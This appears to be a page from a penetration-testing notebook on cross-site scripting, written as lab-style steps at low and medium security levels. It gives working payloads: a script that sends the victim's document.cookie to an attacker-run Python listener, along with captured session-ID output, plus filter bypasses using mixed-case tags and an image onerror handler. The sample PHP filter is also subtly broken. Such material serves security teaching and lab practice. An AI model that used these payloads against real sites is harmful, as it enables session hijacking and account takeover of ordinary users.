XSS Cross Site Scripting

Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it.

Low Security Example

In the case where a website or web application has no security filters on there input forms, you can simple pass plain javascript wrapped in script tags through the form and have the output of the code returned to you.

<script>alert('hello!')</script>

This script would open an alert window with the text 'Hello' inside.

Low Security Cookie Stealing

If we use the same type of schema from before, we can access the documents cookies and pass them to yourself. First you'll have to set up a listener. We can do that with a simple python3 server:

python3 -m http.server 1234
Serving HTTP on 0.0.0.0 port 1234 (http://0.0.0.0:1234/) ...

Next we'll prepare our script for injection:

<script type="text/javascript">document.location="http://192.168.0.1:1234/?cookies="+document.cookie;</script>

This will grab the document cookies and pass them to our python server, which the output would look like:

python3 -m http.server 1234
Serving HTTP on 0.0.0.0 port 1234 (http://0.0.0.0:1234/) ...

192.0.0.1 - - "GET /?cookies=security=low;%20PHPSESSID=ci5j12515 HTTP/1.1 200

We were able to grab the PHP Session ID cookie!

Medium Security Example

Another case of slightly better security would be the application developer attempting to replace matching strings that could be malicious. For example:

if (isset($_GET)) {
    $input = str_replace('script', '');
}

The first way to bypassing this filter is to simple change the character case as to not match the exact string:

<ScRiPt>alert('hi')</sCrIpT>

The second method would be to wrap the malicious javascript in an image tag which would fire the function on error:

<img src="x" onerror="alert('Hello')"></img>

This would be uploaded to the server and would attempt to present as an image. But because there is no source it would reflect back to the error, which is our malicious script.

PreviousCommand InjectionNextWifi Cracking

Last updated